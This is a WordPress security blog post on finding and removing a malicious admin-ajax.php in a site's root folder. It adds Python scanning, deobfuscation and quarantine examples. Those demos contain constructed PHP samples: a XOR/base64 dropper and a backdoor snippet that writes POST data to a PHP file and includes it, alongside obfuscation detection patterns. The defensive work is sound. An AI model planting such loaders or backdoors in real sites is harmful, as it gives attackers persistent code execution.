WordPress powers a large share of the web, and that popularity makes it a constant target for attackers. Recently, a malicious file named admin-ajax.php was found in the root folder of a WordPress site, a location where that file never belongs (the genuine copy lives only at wp-admin/admin-ajax.php). In this blog post, we will discuss how to detect this malicious file, remove it, and take steps to prevent future security breaches.

What is the Malicious admin-ajax.php File?

An admin-ajax.php sitting in your WordPress root folder is not the legitimate WordPress file (that one lives at wp-admin/admin-ajax.php and is never placed in the root) but a malicious script named to blend in with core files. The copy found here contains obfuscated PHP code that executes arbitrary commands, gathers information about the server, and writes further files that act as backdoors so attackers can keep access to your site.

Below is an image of the code found in this file:

[Image: obfuscated PHP code from the malicious admin-ajax.php file in the root folder]

How to Detect the Malicious admin-ajax.php File

  1. Unusual File Presence: Check your root directory for files that do not belong to a standard WordPress install. admin-ajax.php is the obvious one: it should exist only at wp-admin/admin-ajax.php, so a copy next to wp-config.php or index.php is attacker-placed.
  2. File Content Inspection: Open the file and look for obfuscated code: long base64 strings, calls to base64_decode, eval, gzinflate or str_rot13, XOR loops over a string, and dynamic file writing or inclusion (file_put_contents followed by an include of the file just written). Keep in mind that some legitimate code also calls base64_decode, so a hit is a reason to read the file closely, not proof on its own.
  3. Security Plugins: Use security plugins like Wordfence or Sucuri to scan your site for malicious files and activities. If WP-CLI is available, wp core verify-checksums compares the core files against the official release hashes and reports any that were modified.
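To make the first two checks repeatable, here is a small triage scanner, added as an example; it is not from the original post and is not a substitute for Wordfence, Sucuri or wp core verify-checksums. It walks a WordPress tree, flags any admin-ajax.php outside wp-admin/, and reports which obfuscation primitives each PHP file uses. The sample site it builds in a temporary directory, stray file included, is constructed for the demo, and the pattern list is this example's own choice.

```python
"""Triage scan of a WordPress tree: stray admin-ajax.php plus obfuscation hints.
Added example with a constructed sample site; not the blog's code."""
import os
import re
import shutil
import tempfile

# The only place the genuine file lives, relative to the site root.
LEGIT_ADMIN_AJAX = os.path.join("wp-admin", "admin-ajax.php")

# Constructs common in obfuscated droppers.  Legitimate code uses some of these
# too, so a hit means "read this file", not "this file is malware".
SUSPICIOUS = {
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "file_put_contents": re.compile(r"\bfile_put_contents\s*\("),
    # include/require of a variable rather than a literal path
    "dynamic_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*\$"),
    # a byte-wise XOR against an indexed key or an ord() value
    "xor_loop": re.compile(r"\^\s*(\$\w+\[|ord\()"),
    # a quoted base64 run long enough to be a payload rather than an icon
    "long_b64_literal": re.compile(r"""['"][A-Za-z0-9+/]{120,}={0,2}['"]"""),
}


def scan_file(path):
    """Return the names of the SUSPICIOUS patterns found in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    return [name for name, rx in SUSPICIOUS.items() if rx.search(body)]


def scan_site(root):
    """Walk an install and return {relative_path: [reasons]} for files worth a look."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            reasons = []
            if name == "admin-ajax.php" and rel != LEGIT_ADMIN_AJAX:
                reasons.append("admin-ajax.php outside wp-admin/")
            if name.endswith(".php"):
                reasons.extend(scan_file(full))
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_site():
    """Constructed mini install for the demo: three benign files and one stray dropper."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    files = {
        "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n",
        "wp-admin/admin-ajax.php": "<?php define('DOING_AJAX', true); "
                                   "require_once dirname(__DIR__) . '/wp-load.php';\n",
        "wp-content/plugins/demo/demo.php": "<?php /* Plugin Name: Demo */ add_action('init', 'demo_init');\n",
        # Stray copy in the root: decode a blob, XOR it, write it out, include it.
        "admin-ajax.php": "<?php $k='s3cr3t'; $d=base64_decode('" + "QUJD" * 40 + "');\n"
                          "for($i=0;$i<strlen($d);$i++){$d[$i]=$d[$i]^$k[$i%strlen($k)];}\n"
                          "$f=sys_get_temp_dir().'/'.md5($k).'.php'; file_put_contents($f,$d); include($f);\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    try:
        for rel, why in sorted(scan_site(site).items()):
            print(f"{rel}: {', '.join(why)}")
    finally:
        shutil.rmtree(site)
```

Run it against a real install with scan_site("/var/www/html") and read every file it names; expect a handful of legitimate hits (libraries that embed base64 data, for instance) alongside anything genuinely planted.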

Analyzing the Malicious Code

The malicious admin-ajax.php file contains several suspicious elements:

  • Obfuscation: The code XOR-encodes its real payload and stores the result as a base64 string, so a plain text search for suspicious function names finds nothing until that layer is peeled off.
  • Dynamic File Writing: It writes the decoded payload to a new PHP file and includes it, so the code that actually runs never appears in admin-ajax.php itself and attackers can execute arbitrary code.
  • Data Gathering: Calls such as phpversion() collect information about the server; backdoors commonly fingerprint the host this way to pick tooling that will run on it.
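To show what the XOR-plus-base64 layer actually hides, the following added example (not the file from the post, whose contents are only shown in the image above) builds a loader of that shape around a constructed payload, peels the layer back off, and lists the functions each form calls. The payload, the key, and the loader layout matched by the regex are assumptions for the demo.

```python
"""Peel the XOR-then-base64 layer of a PHP loader and list what the payload calls.
Added example around a constructed payload; not the file from the post."""
import base64
import re

# Constructed stand-in for the hidden payload: the three behaviours the post
# describes (fingerprint the host, write a new PHP file, include it).
PAYLOAD = (
    "<?php $u=php_uname(); $v=phpversion(); "
    "file_put_contents(__DIR__.'/.x.php', $_POST['c']); include __DIR__.'/.x.php';"
)


def xor_bytes(data, key):
    """Repeating-key XOR; applying it twice with the same key gives the input back."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(plain_php, key):
    """Build a loader of the shape seen in such droppers: XOR, base64, decode, eval."""
    blob = base64.b64encode(xor_bytes(plain_php.encode(), key.encode())).decode()
    return (
        f"<?php $k='{key}'; $d=base64_decode('{blob}');\n"
        "for($i=0;$i<strlen($d);$i++){$d[$i]=$d[$i]^$k[$i%strlen($k)];}\n"
        "eval($d);\n"
    )


# The loader layout this decoder understands (an assumption for the demo):
# a single-quoted key in $k and the base64 blob passed straight to base64_decode.
LOADER_RX = re.compile(r"\$k='([^']+)';\s*\$d=base64_decode\('([A-Za-z0-9+/=]+)'\)")


def deobfuscate(loader_php):
    """Recover the payload from a loader matching LOADER_RX, or None if it does not match."""
    m = LOADER_RX.search(loader_php)
    if not m:
        return None
    key, blob = m.group(1).encode(), m.group(2)
    return xor_bytes(base64.b64decode(blob), key).decode(errors="replace")


CALL_RX = re.compile(r"\b([a-z_][a-z0-9_]*)\s*\(")
LANGUAGE_CONSTRUCTS = {"for", "foreach", "if", "elseif", "while", "switch",
                       "array", "isset", "empty", "unset", "list", "function"}


def called_functions(php):
    """Sorted, de-duplicated function names called in a PHP snippet."""
    return sorted(set(CALL_RX.findall(php)) - LANGUAGE_CONSTRUCTS)


if __name__ == "__main__":
    loader = obfuscate(PAYLOAD, "k3y!")
    print("loader calls:  ", called_functions(loader))
    print("payload calls: ", called_functions(deobfuscate(loader)))
```

The contrast in the two printed lists is the point: a scanner that only reads the file on disk sees base64_decode, strlen and eval, while php_uname, phpversion and file_put_contents only appear after decoding. Real droppers vary the loader layout, so treat LOADER_RX as a starting point to adapt to the sample in front of you.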

How to Remove the Malicious admin-ajax.php File

  1. Backup Your Site: Before making any changes, back up your entire site, including the database, and label the backup as post-compromise so it is never restored later as a clean copy.
  2. Delete the File: Remove admin-ajax.php from your root directory. Before deleting it, record its SHA-256 hash and timestamps, or move it outside the web root under a non-executable name, so you keep evidence of what ran and can trace requests to it in the access logs. Then confirm that wp-admin/admin-ajax.php still matches the official release.
  3. Scan for Additional Malicious Files: Use security plugins to scan and remove any other malicious files that may have been uploaded. A dropper of this kind writes additional PHP files, so look beyond the one you found, including in wp-content/uploads and any other directory the web server user can write to.
  4. Change Passwords: Update all your passwords, including WordPress admin, hosting account, database, and FTP, and regenerate the authentication keys and salts in wp-config.php so that existing login cookies stop working.
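Steps 2 and 3 are easy to get wrong in the rush to clean up: deleting the file destroys the only artifact you have, and a file that looks like core may itself have been tampered with. The added example below (not from the original post) moves the stray file into a quarantine directory outside the web root under a non-executable name, writes a JSON evidence record beside it, and checks the genuine wp-admin/admin-ajax.php against a hash manifest. The two-file tree and its manifest are constructed for the demo; on a real site the manifest comes from the matching official WordPress release (or run wp core verify-checksums).

```python
"""Evidence-preserving removal of the stray file plus an integrity check on the
genuine core copy.  Added example over a constructed tree; not the blog's code."""
import hashlib
import json
import os
import shutil
import tempfile
import time


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _iso(ts):
    return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(ts))


def quarantine(site_root, rel_path, quarantine_dir):
    """Move site_root/rel_path out of the web root under a non-executable name and
    write a JSON record beside it (hash, size, mtime) before anything is lost."""
    src = os.path.join(site_root, rel_path)
    st = os.stat(src)
    record = {
        "original_path": rel_path,
        "sha256": sha256_of(src),
        "size": st.st_size,
        "mtime": _iso(st.st_mtime),
        "quarantined_at": _iso(time.time()),
    }
    os.makedirs(quarantine_dir, exist_ok=True)
    dst = os.path.join(quarantine_dir, rel_path.replace(os.sep, "__") + ".quarantined")
    shutil.move(src, dst)  # rename, or copy2 + unlink across filesystems: mtime survives either way
    record["quarantine_path"] = dst
    with open(dst + ".json", "w", encoding="utf-8") as fh:
        json.dump(record, fh, indent=2)
    return record


def verify_core(site_root, expected):
    """Relative paths whose file is missing or whose SHA-256 differs from `expected`."""
    bad = []
    for rel, digest in expected.items():
        full = os.path.join(site_root, rel)
        if not os.path.isfile(full) or sha256_of(full) != digest:
            bad.append(rel)
    return bad


def build_demo():
    """Constructed tree: the genuine core copy plus the stray root copy.  The manifest
    is derived from the file just written; on a real site it comes from the official
    release for your exact WordPress version."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    core = os.path.join(root, "wp-admin", "admin-ajax.php")
    os.makedirs(os.path.dirname(core))
    with open(core, "w", encoding="utf-8") as fh:
        fh.write("<?php define('DOING_AJAX', true); require_once dirname(__DIR__) . '/wp-load.php';\n")
    with open(os.path.join(root, "admin-ajax.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php eval(base64_decode('QUJD'));\n")  # stand-in for the dropper
    manifest = {"wp-admin/admin-ajax.php": sha256_of(core)}
    return root, manifest


def tamper_core(root):
    """Simulate an attacker appending to the genuine file, to show the check catches it."""
    with open(os.path.join(root, "wp-admin", "admin-ajax.php"), "a", encoding="utf-8") as fh:
        fh.write("// injected\n")


if __name__ == "__main__":
    root, manifest = build_demo()
    print("core ok before:", verify_core(root, manifest) == [])
    print(json.dumps(quarantine(root, "admin-ajax.php", root + "-quarantine"), indent=2))
    tamper_core(root)
    print("modified core files:", verify_core(root, manifest))
```

Keep the quarantine directory somewhere the web server cannot serve or write (not under the document root), and keep the JSON record with the incident notes: the hash lets you search other hosts and threat-intel sources for the same file, and the mtime gives you a starting point in the access logs.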

Preventing Future Security Breaches

  1. Keep WordPress Updated: Always update WordPress core, themes, and plugins to their latest versions; outdated plugins and themes with known vulnerabilities are the most common way files like this get planted.
  2. Use Security Plugins: Install security plugins like Wordfence, Sucuri, or iThemes Security to provide an additional layer of protection, including scheduled file scans that will catch a new file in the root before you would notice it by hand.
  3. Regular Backups: Regularly back up your site and store the backups in a location the web server cannot write to, so a compromise cannot also destroy or poison them.
  4. Strong Passwords: Use strong, unique passwords for all your accounts, enable two-factor authentication for administrator logins where it is available, and rotate credentials immediately whenever you suspect a compromise.
  5. Limit Access: Give dashboard access only to users who need it, with the lowest role that does the job, and tighten file permissions on the server so the web server user cannot write outside wp-content/uploads; a compromised plugin then cannot drop a new PHP file into the root.

Conclusion

Security is a critical aspect of managing a WordPress site. By being vigilant and taking proactive measures, you can protect your site from malicious attacks. Regularly check your site for unusual files, keep everything updated, and use security plugins to help safeguard your site. If you suspect your site has been compromised, take immediate action to remove the threat and strengthen your security practices.

Stay safe and keep your WordPress site secure!